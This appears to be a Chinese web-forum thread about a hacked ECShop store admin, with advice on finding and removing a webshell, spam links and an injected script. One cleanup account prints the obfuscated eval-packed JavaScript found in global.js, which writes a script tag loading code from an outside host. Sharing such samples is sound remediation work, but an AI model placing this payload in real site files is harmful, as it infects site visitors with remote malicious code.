后台被挂马~EC是否有漏洞??

2016-07-07 15:26 来源:www.chinab4c.com 作者:ecshop专家





http://www.dellzz.com
后台被挂马,登录进去之后首先是这个提示
联系空间商,居然让我自己解决,KAO~
后台程序重新覆盖不管用~~
晓天赶快看一看呀~~

回答:
以下是后台内容,请晓天看一下是否有问题,万分感谢!!
admin.part01.rar (292.97 KB)
admin.part02.rar (292.97 KB)
admin.part03.rar (292.97 KB)
admin.part04.rar (292.97 KB)
admin.part05.rar (93.84 KB)

先看源码中是否有病毒代码,如果没有,就是ARP攻击,必须找空间商才能解决。
如果发现病毒代码,删除代码后修改FTP密码,越复杂越好。再检查有没有遗留的木马文件

先看源码中是否有病毒代码,如果没有,就是ARP攻击,必须找空间商才能解决。
如果发现病毒代码,删除代码后修改FTP密码,越复杂越好。再检查有没有遗留的木马文件
镜花水月 发表于 2010-6-4 10:53


哥哥,那么多文件怎么看呀~
你Q多少呀,我的3431992,帮我看一下~~谢谢~

哥哥,那么多文件怎么看呀~
你Q多少呀,我的3431992,帮我看一下~~谢谢~
dellzz 发表于 2010-6-4 10:57


通过FTP看文件修改时间,有嫌疑的下载到本地查看,或者后台校验文件

通过FTP看文件修改时间,有嫌疑的下载到本地查看,或者后台校验文件
镜花水月 发表于 2010-6-4 11:23


好的,非常感谢~~

我以前也遇到过不过我自己解决好了

我以前也遇到过不过我自己解决好了
lijian0799 发表于 2010-6-4 16:08


怎么解决的?兄弟能不能交流一下~!

我的也被挂马了。

具体问题请官方看这个解决办法。http://www.fengyn.cn/article/web/261.htm

今天有个朋友的网站是ECSHOP的被挂了木马和黑链,经历了一番查找、比较,终于清理的木马。
简单分享下清理过程:

清理黑链接很简单,找到文件,修改掉就OK了。SHELL也很容易找到,这个shell是在data目录下找到的。
关键是寻找被挂的恶意代码,着实费了一番力气。

后来找到后发现,他使用的是JS挂马,挂的是global.js
找这个为什么这么难,他的修改时间是和官方的默认文件一摸一样,我通过对比时间、使用后台的文件校验、比对代码,终于找到了挂的一段代码

在js中使用了以下的代码


[url=]莸[/url]
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('2.8("<6 7=3://1.9.4/0.5></6>")',62,10,'|c|document|http|info|jpg|script|src|write|zzbzm'.split('|'),0,{}));



这段代码解释过来就是 http://c.zzbzm.info/0.jpg

就这个恶意代码了。

清除掉以后,杀软顿时不再警报

至此,SHELL、恶意代码、黑链接全部清理掉

不过,漏洞应该还未补上,建议设置好网站的写和执行权限,并补上补丁或升级至最新版。

ECSHOP被攻击,着实不少朋友遇到,有问题的朋友,可以联系本人。

留个记号